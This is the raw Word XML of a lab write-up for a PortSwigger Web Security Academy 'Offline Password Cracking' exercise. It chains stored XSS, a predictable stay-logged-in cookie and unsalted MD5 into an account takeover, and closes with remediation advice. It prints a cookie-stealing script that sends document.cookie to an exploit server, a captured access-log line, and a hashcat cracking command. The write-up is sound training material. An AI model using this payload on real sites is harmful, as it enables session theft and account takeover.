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6A0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">PortSwigger Lab Write-Up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1A"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
        <w:t xml:space="preserve">Offline Password Cracking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56A0" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before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Author: Neelesh Pandey  |  Platform: PortSwigger Web Security Academy  |  Difficulty: Practitioner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Category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Authentication / XSS + Cookie Theft + Hash Cracking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Vulnerabilities Chained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Stored XSS + Predictable cookie + Unsalted MD5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Cookie Formula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base64( username + ":" + md5(password) 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Hash Cracked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26323c16d5f4dabff3bb136f2460a943 → onceuponatime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Key Insight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XSS steals cookie → decode hash → crack offline → account takeover</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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1. ATTACK CHAIN OVERVIEW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Stored XSS in blog comments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↓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Carlos visits page → script executes → cookie stolen to exploit server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↓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Base64 decode → extract MD5 hash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↓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Crack MD5 offline (search engine or hashcat)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↓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Login as carlos → delete account → lab solved</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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Each vulnerability alone is limited. Chained together they result in complete account takeover without ever brute-forcing the login directly.</w:t>
      </w:r>
    </w:p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2. RECONNAISSANCE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Cookie Formula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Logged in as wiener:peter with Stay logged in selected. Decoded cookie confirmed same formula as previous lab:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pP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stay-logged-in = base64( username + ":" + md5(password) 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wiener cookie  → wiener:51dc30ddc473d43a6011e9ebba6ca770</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="10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XSS Discovery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Tested comment functionality with a basic XSS payload — comment content rendered unsanitised. Stored XSS confirmed.</w:t>
      </w:r>
    </w:p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3. STEALING CARLOS'S COOKIE VIA XSS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3.1 XSS Payload Posted as Blog Comment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&lt;script&gt;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document.location='//YOUR-EXPLOIT-SERVER.exploit-server.net/'+document.cookie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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="10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document.location redirects the victim's browser to the exploit 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document.cookie appends all cookies as part of the URL path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When Carlos visits the blog post, script executes automatically (stored XSS)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His stay-logged-in cookie is sent to exploit server as a GET request parameter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3.2 Capture from Exploit Server Access Log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GET /stay-logged-in=Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz HTTP/1.1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Host: exploit-server.net</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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Carlos's stay-logged-in cookie captured in the access log.</w:t>
      </w:r>
    </w:p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4. DECODING THE COOKIE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Decoded in Burp Decoder:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pP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Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz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→ carlos:26323c16d5f4dabff3bb136f2460a943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Component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carlos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MD5 Hash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26323c16d5f4dabff3bb136f2460a943</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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5. CRACKING THE HASH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Method 1 — Search Engine (Lab)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Pasted hash into search engine → Password: onceuponatime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Works because unsalted MD5 hashes of common passwords are publicly indexed in rainbow tables online.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="10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Method 2 — hashcat (Real Engagements)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echo '26323c16d5f4dabff3bb136f2460a943' &gt; hash.txt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hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt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-m 0 = MD5 mode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Output: 26323c16d5f4dabff3bb136f2460a943:onceuponatime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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Important: Never submit client hashes to online search engines in real engagements — use hashcat locally to avoid leaking sensitive data.</w:t>
      </w:r>
    </w:p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6. WHY THIS CHAIN WORKS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Vulnerability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Root Cause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Stored XSS in comments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output encoding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Arbitrary JS executes in victim browser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HttpOnly on cookie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document.cookie readable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XSS can access stay-logged-in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MD5 without salt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Hash crackable offline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onceuponatime found in rainbow table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CSP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External redirects allowed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document.location not blocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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7. KEY TAKEAWAYS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Vulnerability chaining multiplies impact — XSS alone limited if HttpOnly; weak cookies alone require brute-force; chained = instant account takeover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HttpOnly flag breaks this entire attack chain — if the cookie had HttpOnly, document.cookie would return empty and the XSS payload would fail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Unsalted MD5 is instantly crackable — common passwords are indexed publicly; same hash always = same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Never submit hashes to online services in real engagements — use hashcat locally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Stored XSS is more dangerous than reflected — executes automatically for every visitor, not just those who click a crafted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document.location + document.cookie is a fundamental XSS exploitation pattern — memorise it</w:t>
      </w:r>
    </w:p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8. REMEDIATION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Finding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Risk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Stored XSS in comments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HTML-encode all user output before rendering — never insert raw user content into HTML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stay-logged-in without HttpOnly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 HttpOnly flag — JavaScript cannot read HttpOnly cookies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MD5 password hash in cookie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 cryptographically random token — never store password derivatives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Content Security Policy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Implement CSP to restrict external redirects and unauthorised scripts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Unsalted MD5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 bcrypt/Argon2 with per-user salt for all password storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pP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Secure cookie with all protective flags:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pP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Set-Cookie: stay-logged-in=&lt;random-token&gt;; HttpOnly; Secure; SameSite=Strict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HttpOnly    → JavaScript cannot read this cookie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Secure      → Only sent over HTTPS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SameSite    → Not sent on cross-site requests (CSRF protection)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="1A56A0" w:sz="4" w:space="4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Neelesh Pandey  |  github.com/Neelesh707  |  linkedin.com/in/neelesh-pandey021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2026-04-14T00:00:02.041Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-14T00:00:02.043Z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